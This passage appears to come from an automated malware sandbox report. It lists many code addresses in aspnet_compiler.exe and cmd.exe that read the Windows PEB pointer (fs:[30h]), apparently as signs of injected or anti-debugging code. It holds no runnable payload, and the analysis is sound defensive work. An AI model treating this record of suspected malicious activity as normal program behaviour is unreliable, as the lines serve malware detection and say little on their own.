        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F7D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DC962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FC577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010FC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01102581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01101DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011551BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011061A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011061A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011035A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011569A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01156DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01188DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010ED5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010ED5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011641E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01157016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01191C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01156C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010EB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0116C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010F0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010F746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01192073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D9080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01153884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011020A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011190AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0116B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0116B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D58EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011914FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01156CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0119131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0116FF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010FF716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A8B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DDB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010EEF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DF358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01103B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DDB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010EFF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A8F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01157794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01102397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0119138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0118D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E8794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01104BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A5BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011553CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011137F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010FDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011003E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DC600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01108E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01191608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010F3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D5210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0118FE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010DE620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01114A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01164257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0119EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E7E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0119AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0111927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0118B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A8A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010FAE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0116FE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0110FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010D52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011546A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010EAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A0EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011A8ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01118EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_0118FEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01102ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011036CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_010E76E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_011016E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 3_2_01102AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_001DB5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D18ED6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C736CC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C72ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CFFEC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C88EC7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C72AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C716E0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C576E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CDFE87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C452A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CC46A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D10EA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5AAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C49240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C57E41 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0AE44 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CD4257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5766D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CFB260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C8927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D18A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C6AE73 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4C600 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C78E00 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C58A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C45210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C45210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D01608 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C63A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7A61C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4E620 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C84A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CFFE3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CC53CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C6DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C837F5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C51B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CFD380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C72397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C58794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CC7794 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C74BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D15BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5EF40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D18B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C4DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C5FF60 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D18F6A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C73B7A mov eax, dword ptr fs:[00000030h]
